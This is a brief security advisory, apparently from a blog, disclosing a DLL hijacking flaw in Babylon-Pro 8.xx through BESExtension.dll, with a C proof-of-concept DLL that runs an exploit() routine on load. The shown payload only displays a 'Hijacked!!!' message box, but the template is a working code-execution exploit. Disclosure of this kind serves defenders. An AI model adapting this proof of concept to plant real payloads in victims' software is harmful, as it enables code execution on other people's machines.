Babylon-Pro 8.xx DLL Hijacking

============ { Advisory 22/11/2010 } =============

Vulnerable Dll: BESExtension.dll

Tested on: Windows 7 x32 and Windows xp sp3 x32
#include <windows.h>

BOOL WINAPI DllMain ( HANDLE hinstDLL,  DWORD fdwReason, LPVOID lpvReserved)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

exploit();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

int exploit()

{

MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);

}

Credits:

# Discoverd By: Locu

# Website: https://xlocux.wordpress.com

# Contacts: xlocux[-at-]gmail.com

================== { EOF } =====================

One comment

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.